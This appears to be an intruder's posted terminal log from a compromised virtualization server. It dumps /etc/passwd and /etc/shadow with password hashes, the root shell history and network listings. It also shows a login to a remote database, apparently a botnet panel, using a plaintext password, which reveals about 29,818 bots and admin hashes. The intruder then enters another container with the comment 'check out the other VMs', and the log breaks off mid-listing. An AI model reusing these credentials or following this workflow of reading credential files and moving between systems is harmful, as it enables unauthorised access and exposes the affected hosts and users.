+adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +nscd:x:28:28:NSCD Daemon:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin +mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin +smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin +pcap:x:77:77::/var/arpwatch:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +haldaemon:x:68:68:HAL daemon:/:/sbin/nologin +avahi:x:70:70:Avahi daemon:/:/sbin/nologin +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin +rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin +nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +lxlabs:x:500:500::/home/lxlabs:/sbin/nologin +mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash +truevm:x:503:503:System User for 130:/home/truevm:/usr/bin/lxopenvz +stansecuvm:x:504:504:System User for 140:/home/stansecuvm:/usr/bin/lxopenvz +bnetvm:x:506:506:System User for 160:/home/bnetvm:/usr/bin/lxopenvz +scriptstvm:x:508:508:System User for 180:/home/scriptstvm:/usr/bin/lxopenvz +spikevm:x:514:514:System User for 240:/home/spikevm:/usr/bin/lxopenvz +xtothecvm:x:515:515:System User for 250:/home/xtothecvm:/usr/bin/lxopenvz +y00vm:x:516:516:System User for 260:/home/y00vm:/usr/bin/lxopenvz +iodasvm:x:517:517:System User for 270:/home/iodasvm:/usr/bin/lxopenvz +rootvm:x:520:520:System User for 300:/home/rootvm:/usr/bin/lxopenvz +stansocksvm:x:521:521:System User for 310:/home/stansocksvm:/usr/bin/lxopenvz +bdgatevm:x:524:524:System User for 340:/home/bdgatevm:/usr/bin/lxopenvz +fredvm:x:525:525:System User for 350:/home/fredvm:/usr/bin/lxopenvz +spike80vm:x:526:526:System User for 360:/home/spike80vm:/usr/bin/lxopenvz +ixdevm:x:527:527:System User for 370:/home/ixdevm:/usr/bin/lxopenvz +wohovm:x:528:528:System User for 380:/home/wohovm:/usr/bin/lxopenvz +sethvm:x:529:529:System User for 390:/home/sethvm:/usr/bin/lxopenvz + +# cat /etc/shadow +root:$1$v.vPGI.9$s9ss0TBUPqOe9X3ufPT4W1:15105:0:99999:7::: +bin:*:15105:0:99999:7::: +daemon:*:15105:0:99999:7::: +adm:*:15105:0:99999:7::: +lp:*:15105:0:99999:7::: +sync:*:15105:0:99999:7::: +shutdown:*:15105:0:99999:7::: +halt:*:15105:0:99999:7::: +mail:*:15105:0:99999:7::: +news:*:15105:0:99999:7::: +uucp:*:15105:0:99999:7::: +operator:*:15105:0:99999:7::: +games:*:15105:0:99999:7::: +gopher:*:15105:0:99999:7::: +ftp:*:15105:0:99999:7::: +nobody:*:15105:0:99999:7::: +nscd:!!:15105:0:99999:7::: +vcsa:!!:15105:0:99999:7::: +rpc:!!:15105:0:99999:7::: +mailnull:!!:15105:0:99999:7::: +smmsp:!!:15105:0:99999:7::: +pcap:!!:15105:0:99999:7::: +dbus:!!:15105:0:99999:7::: +haldaemon:!!:15105:0:99999:7::: +avahi:!!:15105:0:99999:7::: +sshd:!!:15105:0:99999:7::: +avahi-autoipd:!!:15105:0:99999:7::: +rpcuser:!!:15105:0:99999:7::: +nfsnobody:!!:15105:0:99999:7::: +apache:!!:15106:::::: +lxlabs:!!:15106:0:99999:7::: +mysql:!!:15106:::::: +truevm:$1$Cp/eTTFF$nqVR5/rgSvqs51UIuz6Et.:15251:0:99999:7::: +stansecuvm:$1$o3WpZh6S$mPXWzQjMEL5zIkwBFhGGD1:15112:0:99999:7::: +bnetvm:$1$V.AhGgm3$o4ZdgfznQ3sE2.1KJa0qx/:15115:0:99999:7::: +scriptstvm:$1$W5AWFCAH$dbJijEizlB92aFTY7HCDX.:15116:0:99999:7::: +spikevm:$1$m1v5zxhw$xs3WszkyroI/FWi8djdo4.:15132:0:99999:7::: +xtothecvm:$1$D9ZLxI1c$Sopa3HPCOBTRC4c6KBtCD/:15134:0:99999:7::: +y00vm:$1$k1GqAtHB$mdsd292s..nL/v6YG5Tfz0:15138:0:99999:7::: +iodasvm:$1$6laui1W/$L/evF8MACUrrJ.AUbBC2E.:15138:0:99999:7::: +rootvm:$1$0rDTGCQP$1OK0z1ldsptZuWD9YJmfM.:15201:0:99999:7::: +stansocksvm:$1$KbcEDmUM$Idr7lpMI/JOYU0pY3uafF/:15201:0:99999:7::: +bdgatevm:$1$0TIPnn9P$.IoVhoG0DYMW0gUfzUqnH/:15208:0:99999:7::: +fredvm:$1$QKXpFmyk$tNA8I7G6ZCc5eKbuHyHTr/:15222:0:99999:7::: +spike80vm:$1$Ir2OIga1$Xfp.9xdaXFWaaxc18Q/hR/:15224:0:99999:7::: +ixdevm:$1$xK6jSstU$cOuss77pdmE6YfUmBL2pa1:15226:0:99999:7::: +wohovm:$1$SRfLhbuK$gz/o3IYB/WJdHKGPhll6z0:15233:0:99999:7::: +sethvm:$1$aal3q4fB$bf2DeWIqbsZ/IVjBGhepv0:15250:0:99999:7::: + +# pwd +/root + +# alias ls="ls -la" + +# ls +total 341288 +drwxr-x--- 4 root root 4096 Oct 9 08:20 . +drwxr-xr-x 25 root root 4096 Oct 10 05:48 .. +-rw------- 1 root root 6069 Oct 9 08:37 .bash_history +-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout +-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile +-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc +-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc +drwxr-xr-x 16 root root 4096 May 10 2009 .etc +-rw------- 1 root root 41 Oct 9 07:59 .lesshst +-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc +-rw-r--r-- 1 root root 134392688 May 12 02:28 1000mb.bin +-rw-r--r-- 1 root root 135565568 May 12 05:16 1000mb.bin.1 +-rw-r--r-- 1 root root 30797000 May 12 02:23 100mb.test +-rw-r--r-- 1 root root 48135408 May 12 02:55 100mb.test.1 +-rw------- 1 root root 1171 May 11 09:46 anaconda-ks.cfg +-rw-r--r-- 1 root root 719 May 12 01:03 hypervm-install-master.sh +-rw-r--r-- 1 root root 14502 May 11 09:46 install.log +-rw-r--r-- 1 root root 2886 May 11 09:46 install.log.syslog +drwxr-xr-x 7 root root 4096 May 12 01:04 program-install +-rw-r--r-- 1 root root 68091 Jun 4 2009 program-install.zip + +# cat .bash_history +yum install openssh-server net-snmp +nano /etc/snmp/snmpd.conf +/etc/init.d/snmpd restart +exit +top +setenforce 0 +wget http://download.lxcenter.org/download/hypervm/production/hypervm-install-master.sh +sh ./hypervm-install-master.sh --virtualization-type=xen/openvz/NON +sh ./hypervm-install-master.sh --virtualization-type=openvz +nano /etc/grub.conf +shutdown -r now +wget http://mirror.leaseweb.com/speedtest/1000mb.bin +top +service hypervm +service hypervm start +yum install iptraf +iptraf +nano /etc/resolv.conf +nano /etc/resolv.conf +ifconfig +tracert +tracert 193.107.16.183 +193.107.16.82 +tracert 193.107.16.183 +wget http://cachefly.cachefly.net/100mb.test +wget http://cachefly.cacwget http://cachefly.cachefly.net/100mb.testhefly.net/100mb.test +get http://cachefly.cachefly.net/1000mb.test +wget http://cachefly.cachefly.net/1000mb.test +wget http://cachefly.cachefly.net/100mb.test +wget http://mirror.leaseweb.com/speedtest/1000mb.bin +lsmod |grep -i ipt_conntrack +/sbin/modprobe ipt_owner +/sbin/modprobe ipt_recent +/sbin/modprobe ipt_tos +/sbin/modprobe ipt_TOS +/sbin/modprobe ipt_LOG +/sbin/modprobe ip_conntrack +/sbin/modprobe ipt_limit +/sbin/modprobe ipt_multiport +/sbin/modprobe iptable_filter +/sbin/modprobe iptable_mangle +/sbin/modprobe iptable_TCPMSS +/sbin/modprobe iptable_tcpmss +/sbin/modprobe ipt_tcpmss +/sbin/modprobe ipt_ttl +/sbin/modprobe ipt_length +/sbin/modprobe ipt_state +/sbin/modprobe ipt_nat +/sbin/modprobe ip_nat_ftp +nano /etc/sysconfig/iptables-config +nano /etc/sysconfig/vz +service iptables restart +service vz start +service vz stop +service iptables restart +service vz start +iptables -A INPUT -p tcp --dport 80 -j DROP +iptables -A INPUT -p tcp --dport 3306 -j DROP +ping www.besthotshop.info +ping www.ddstores.com +modprobe ipt_limit +nano /etc/sysconfig/iptables-config +nano /etc/sysconfig/vz +iptables restart +/etc/init.d/iptables restart +vzctl set 110 --iptables "ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save + + + + +save +-- save +vzctl set 110 --iptables iptable_nat --save +vzctl stop 110 +vzctl set 110 --iptables iptable_nat --save +vzctl set 110 --iptables iptable_nat ipt_limit --save +vzctl set 110 --iptables ipt_limit --save +vzctl restart 110 +vzctl stop 110 +nano /etc/sysconfig/vz +service vz restart +vzctl set 110 --numiptent 2000 --save +vzctl stop 110 +vzctl set 110 --iptables +vzctl set 110 --iptables ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save +vzctl set 110 --iptables +vzctl set 110 --iptables -h +vzctl set 110 -h +vzctl set 110 --help +modprobe ipt_limit + +ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_l +iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j DROP +iptables --flush +service vz restart +iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 8 -j DROP +sdasdasdasd +modprobe ipt_connlimit +nano /etc/sysconfig/vz +nano /etc/sysconfig/iptables-config +/etc/init.d/iptables restart +service vz restart +shutdown -r now +service vz restart +lsmod | grep ipt +modprobe -v xt_connlimit +echo 2262144 > /proc/sys/net/ipv4/ip_conntrack_max +echo 22262144 > /proc/sys/net/ipv4/ip_conntrack_max +dmeg +dmesg +iptables --flush +service iptables restart +iptraf +modprobe xt_state +sysctl net.ipv4.netfilter.ip_conntrack_max +wc -l /proc/net/ip_conntrack +sysctl - +sysctl -po +sysctl -p +nano /etc/sysctl.conf +sysctl -p +nano /etc/sysctl.conf +sysctl -p +sysctl -p | grep mem +sysctl -p | grep mem +yum install htop +system-config-network +ifconfig +ping 193.107.17.66 +ping 193.107.17.67 +iptables --flush +ping 193.107.17.80 +sysctl -p | grep mem +ping 193.107.17.66 +ping 193.107.17.80 +nano /etc/sysctl.conf +service network restart +ip route +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +service network restart +service network restart +ip route +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +ip route +ip route add 193.107.17.80 dev venet0 scope link +ip route add 193.107.17.66 dev venet0 scope link +nano /etc/sysctl.conf +service sysctl restart +sysctl -p +sysctl -a +ip route +ip route add 193.107.17.66 dev eth0 scope link +ip route add 193.107.17.67 dev eth0 scope link +ip rute +ip route +service network restart +ifup-local +ip route +ip route add 193.107.17.0/24 dev eth0 +route add 193.107.17.0/24 netmask 255.255.255.0 dev eth1 + +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.1 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +route +redhat-config-network +network-admin +route add default2 gw 193.107.17.1 eth0 +route add default gw 193.107.17.1 eth0 +route +service httpd stop +route add default gw 193.107.17.1 eth0 +route add default2 gw 193.107.17.1 eth0 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68 +ip route add 193.107.17.0/24 dev eth0 +ifconfig +route add default gw 193.107.17.1 eth0 +ip route add 193.107.17.0/24 dev eth0 +service network restart +ip route add 193.107.17.0/24 dev eth0 +route add default gw 193.107.17.1 eth0 + +ip route add 193.107.17.0/24 dev venet0 +netstat +paswd +passwd +modprobe tun +vzctl set 310 --devices c:10:200:rw --save +vzctl set 310 --capability net_admin:on --save +modprobe ipt_mark +modprobe ipt_MARK +modprobe tun +vzctl stop 310 +vzctl set 310 --capability net_admin:on --save +vzctl set 310 --devices c:10:200:rw --save +vzctl start 310 +vzctl exec 310 mkdir -p /dev/net +vzctl exec 310 mknod /dev/net/tun c 10 200 +vzctl exec 310 chmod 600 /dev/net/tun +df +top +su bnetvm +iptables -A INPUT -p tcp --destination-port 80 -j DROP +top +hitop +htop +ftop +iftop +netstat + +# ifconfig +eth0 Link encap:Ethernet HWaddr E0:CB:4E:4F:A7:D8 + inet addr:193.107.16.82 Bcast:193.107.16.255 Mask:255.255.255.0 + inet6 addr: fe80::e2cb:4eff:fe4f:a7d8/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:3764684 errors:0 dropped:0 overruns:0 frame:0 + TX packets:2963185 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:517778892 (493.7 MiB) TX bytes:429952789 (410.0 MiB) + Interrupt:90 Base address:0x2000 + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + inet6 addr: ::1/128 Scope:Host + UP LOOPBACK RUNNING MTU:16436 Metric:1 + RX packets:3830 errors:0 dropped:0 overruns:0 frame:0 + TX packets:3830 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:257453 (251.4 KiB) TX bytes:257453 (251.4 KiB) + +venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 + UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 + RX packets:2952095 errors:0 dropped:0 overruns:0 frame:0 + TX packets:3188473 errors:0 dropped:313 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:387733783 (369.7 MiB) TX bytes:408435813 (389.5 MiB) + + +# netstat -tulpn +Active Internet connections (only servers) +Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name +tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 9044/tcpserver +tcp 0 0 0.0.0.0:7778 0.0.0.0:* LISTEN 338/kloxo.httpd +tcp 0 0 127.0.0.1:7776 0.0.0.0:* LISTEN 22868/php +tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 9051/tcpserver +tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 8760/tcpserver +tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN 6813/tcpserver +tcp 0 0 0.0.0.0:7779 0.0.0.0:* LISTEN 744/php +tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN 31415/sendmail: MTA +tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 28959/xinetd +tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 27340/named +tcp 0 0 193.107.16.217:53 0.0.0.0:* LISTEN 21090/named +tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 21090/named +tcp 0 0 0.0.0.0:7777 0.0.0.0:* LISTEN 20789/kloxo.httpd +tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 12611/xinetd +tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 21054/sshd +tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 18864/mysqld +tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2855/apache2 +tcp 0 0 193.107.17.80:53 0.0.0.0:* LISTEN 14937/named +tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2255/mysqld +tcp 0 0 193.107.17.81:53 0.0.0.0:* LISTEN 29195/named +tcp 0 0 193.107.16.197:443 0.0.0.0:* LISTEN 19137/lighttpd +tcp 0 0 0.0.0.0:55986 0.0.0.0:* LISTEN 350/perl +tcp 0 0 0.0.0.0:65500 0.0.0.0:* LISTEN 22852/perl +tcp 0 0 0.0.0.0:5544 0.0.0.0:* LISTEN 6594/sshd +tcp 0 0 193.107.17.69:53 0.0.0.0:* LISTEN 24903/named +tcp 0 0 193.107.16.184:53 0.0.0.0:* LISTEN 16961/named +tcp 0 0 193.107.16.183:53 0.0.0.0:* LISTEN 24588/named +tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 25293/sendmail: MTA +tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 6276/portmap +tcp 0 0 193.107.16.196:53 0.0.0.0:* LISTEN 30862/named +tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 15210/smbd +tcp 0 0 193.107.17.67:53 0.0.0.0:* LISTEN 25565/named +tcp 0 0 193.107.16.81:53 0.0.0.0:* LISTEN 12513/named +tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 21079/php-fpm.conf) +tcp 0 0 127.0.0.1:8886 0.0.0.0:* LISTEN 8978/php +tcp 0 0 193.107.16.55:53 0.0.0.0:* LISTEN 8944/named +tcp 0 0 0.0.0.0:8887 0.0.0.0:* LISTEN 7026/hypervm.httpd +tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 6608/cupsd +tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 7026/hypervm.httpd +tcp 0 0 193.107.17.83:53 0.0.0.0:* LISTEN 18447/named +tcp 0 0 0.0.0.0:8889 0.0.0.0:* LISTEN 8978/php +tcp 0 0 0.0.0.0:985 0.0.0.0:* LISTEN 6315/rpc.statd +tcp 0 0 193.107.17.68:53 0.0.0.0:* LISTEN 27340/named +tcp 0 0 193.107.16.55:443 0.0.0.0:* LISTEN 16889/lighttpd +tcp 0 0 127.0.0.1:2000 0.0.0.0:* LISTEN 25205/varnishd +tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 20954/nginx +tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 15210/smbd +tcp 0 0 :::80 :::* LISTEN 28969/httpd +tcp 0 0 :::21 :::* LISTEN 31096/proftpd: (acc +tcp 0 0 ::1:953 :::* LISTEN 27340/named +tcp 0 0 :::22 :::* LISTEN 21198/sshd +tcp 0 0 :::443 :::* LISTEN 2460/httpd +tcp 0 0 :::5544 :::* LISTEN 6594/sshd +tcp 0 0 :::53 :::* LISTEN 16961/named +udp 0 0 0.0.0.0:111 0.0.0.0:* 6276/portmap +udp 0 0 193.107.16.55:53 0.0.0.0:* 8944/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 8944/named +udp 0 0 193.107.16.197:53 0.0.0.0:* 15203/tinydns +udp 0 0 193.107.16.81:53 0.0.0.0:* 12513/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 12513/named +udp 0 0 193.107.16.184:53 0.0.0.0:* 16961/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 16961/named +udp 0 0 193.107.17.80:53 0.0.0.0:* 14937/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 14937/named +udp 0 0 193.107.17.83:53 0.0.0.0:* 18447/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 18447/named +udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd +udp 0 0 0.0.0.0:137 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd +udp 0 0 0.0.0.0:138 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.217:53 0.0.0.0:* 21090/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 21090/named +udp 0 0 193.107.16.183:53 0.0.0.0:* 24588/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 24588/named +udp 0 0 193.107.17.69:53 0.0.0.0:* 24903/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 24903/named +udp 0 0 193.107.17.67:53 0.0.0.0:* 25565/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 25565/named +udp 0 0 193.107.17.68:53 0.0.0.0:* 27340/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 27340/named +udp 0 0 193.107.17.81:53 0.0.0.0:* 29195/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 29195/named +udp 0 0 193.107.16.196:53 0.0.0.0:* 30862/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 30862/named +udp 0 0 0.0.0.0:631 0.0.0.0:* 6608/cupsd +udp 0 0 0.0.0.0:979 0.0.0.0:* 6315/rpc.statd +udp 0 0 0.0.0.0:982 0.0.0.0:* 6315/rpc.statd +udp 0 0 0.0.0.0:10000 0.0.0.0:* 22852/perl +udp 0 0 0.0.0.0:10000 0.0.0.0:* 350/perl +udp 0 0 0.0.0.0:53957 0.0.0.0:* 29116/avahi-daemon: +udp 0 0 0.0.0.0:5353 0.0.0.0:* 29116/avahi-daemon: +udp 0 0 :::53 :::* 16961/named +udp 0 0 :::53 :::* 24588/named +udp 0 0 :::5353 :::* 29116/avahi-daemon: +udp 0 0 :::56885 :::* 29116/avahi-daemon: + +# cd /home/ + +# ls +total 104 +drwxr-xr-x 21 root root 4096 Oct 3 08:21 . +drwxr-xr-x 25 root root 4096 Oct 10 05:48 .. +drwx------ 2 bdgatevm bdgatevm 4096 Aug 22 05:35 bdgatevm +drwx------ 2 bnetvm bnetvm 4096 May 21 02:36 bnetvm +drwx------ 2 fredvm fredvm 4096 Sep 5 08:40 fredvm +drwxr-xr-x 2 root root 4096 May 12 01:07 httpd +drwxr-xr-x 7 root root 4096 Aug 22 06:08 hypervm +drwx------ 2 iodasvm iodasvm 4096 Jun 13 03:25 iodasvm +drwx------ 2 ixdevm ixdevm 4096 Sep 9 09:19 ixdevm +drwx------ 2 lxlabs lxlabs 4096 May 12 01:04 lxlabs +drwx------ 2 rootvm rootvm 4096 Aug 15 04:15 rootvm +drwx------ 2 scriptstvm scriptstvm 4096 May 22 02:41 scriptstvm +drwx------ 2 sethvm sethvm 4096 Oct 3 08:21 sethvm +drwx------ 2 spike80vm spike80vm 4096 Sep 7 01:32 spike80vm +drwx------ 2 spikevm spikevm 4096 Jun 7 09:21 spikevm +drwx------ 2 stansecuvm stansecuvm 4096 May 18 03:40 stansecuvm +drwx------ 2 stansocksvm stansocksvm 4096 Aug 15 04:26 stansocksvm +drwx------ 2 truevm truevm 4096 May 16 06:29 truevm +drwx------ 2 wohovm wohovm 4096 Sep 16 03:03 wohovm +drwx------ 2 xtothecvm xtothecvm 4096 Jun 9 08:40 xtothecvm +drwx------ 2 y00vm y00vm 4096 Jun 13 03:02 y00vm + +# du -h +20K ./ixdevm +20K ./scriptstvm +20K ./fredvm +20K ./rootvm +20K ./spikevm +20K ./stansecuvm +20K ./xtothecvm +20K ./iodasvm +20K ./bdgatevm +20K ./y00vm +20K ./stansocksvm +20K ./spike80vm +32K ./lxlabs +20K ./wohovm +8.0K ./httpd +20K ./sethvm +32K ./hypervm/xen/template +40K ./hypervm/xen +1.7M ./hypervm/selfbackup/self/__backup +1.7M ./hypervm/selfbackup/self +1.7M ./hypervm/selfbackup +4.0K ./hypervm/vps/fred.vm/__backup +8.0K ./hypervm/vps/fred.vm +12K ./hypervm/vps +16K ./hypervm/lxguard +8.0K ./hypervm/client/admin +16K ./hypervm/client +1.8M ./hypervm +20K ./bnetvm +20K ./truevm +2.2M . + +# mysql -u snap_db snap_db -pwBqGlNtjZ2m -h bgate.secure-host.in +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 717502 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 29818 | ++----------+ +1 row in set (0.00 sec) + +mysql> select * from list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | 76a2173be6393254e72ffa4d6df1030a | 255 | dark | en | +| 2 | test | 598d4c200461b81522a3328565c25f7c | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +2 rows in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# 29818 bots here, not bad...^C +# +# We better check out the other VMs + +# vzlist +Warning: Unknown iptable module: ipt_connlimit, skipped + CTID NPROC STATUS IP_ADDR HOSTNAME + 130 64 running 193.107.16.55 true + 140 60 running 193.107.16.197 stansecu + 160 62 running 193.107.16.81 testing + 180 18 running 193.107.16.184 scriptst + 240 59 running 193.107.17.80 spike + 250 34 running 193.107.17.82 vps287.cyberhost.kz + 260 59 running 193.107.17.83 y00 + 270 38 running 193.107.17.66 iodas + 300 34 running 193.107.16.217 Ro0t.cyberhost.kz + 310 23 running 193.107.16.183 stansocks + 340 56 running 193.107.17.69 badgate.cyberhost.kz + 350 59 running 193.107.17.67 fr3d.cyberhost.kz + 360 61 running 193.107.17.68 vps241.cyberhost.kz + 370 61 running 193.107.17.81 vps249.cyberhost.kz + 380 64 running 193.107.16.196 vps254.cyberhost.kz + 390 10 running 193.107.16.185 vps522.cyberhost.kz + +# vzctl enter 130 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 130 + +[root@true /]# last +reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:55) +reboot system boot 2.6.18-238.9.1.e Tue Oct 4 10:42 (6+01:17) +root pts/0 77-20-18-64-dyni Tue Oct 4 10:04 - down (00:37) +reboot system boot 2.6.18-238.9.1.e Tue Oct 4 09:54 (00:47) +root pts/0 p5483a590.dip.t- Sat Oct 1 12:50 - 12:55 (00:05) +root pts/0 p5483a590.dip.t- Sat Oct 1 07:48 - 08:31 (00:43) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:19 (5+23:56) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:11 (00:08) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:10 (00:00) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 09:50 (04:19) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:23 (18:26) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:20 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:19 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:16 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:05 (00:10) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:54 (00:10) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:52 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:49 (00:02) +root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:32 - 17:03 (00:31) +root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:21 - 16:32 (00:10) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 11:18 (25+03:30) +root pts/0 p5483df28.dip.t- Thu Sep 1 10:49 - down (00:29) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (01:19) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (00:00) + +[root@true /]# cd /home/ + +[root@true home]# ls -la +total 60 +drwxr-xr-x 15 root root 4096 Oct 1 12:50 . +drwxr-xr-x 23 root root 4096 Oct 10 13:48 .. +drwx------ 3 admin admin 4096 Sep 1 11:01 admin +drwx------ 2 axfrdns axfrdns 4096 Sep 1 11:10 axfrdns +drwx------ 2 dnscache dnscache 4096 Sep 1 11:10 dnscache +drwx------ 2 dnslog dnslog 4096 Sep 1 11:10 dnslog +drwxr-xr-x 3 root root 4096 Sep 1 11:12 httpd +drwxr-xr-x 3 root root 4096 Oct 1 07:55 irc +drwxr-xr-x 6 root root 4096 Sep 2 04:15 kloxo +drwxr-xr-x 3 root root 4096 Sep 1 11:00 lxadmin +drwx------ 2 lxlabs lxlabs 4096 Sep 1 10:53 lxlabs +drwxr-xr-x 3 root root 4096 Oct 1 12:52 mocks +drwx------ 2 nouser nogroup 4096 Sep 1 10:53 nouser +drwx------ 2 tinydns tinydns 4096 Sep 1 11:10 tinydns +drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 true.cyberhost.kz + +[root@true true.cyberhost.kz]# cd true.cyberhost.kz/ + +[root@true true.cyberhost.kz]# ls -la +total 36 +drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 . +drwxr-xr-x 15 root root 4096 Oct 1 12:50 .. +-rw-r--r-- 1 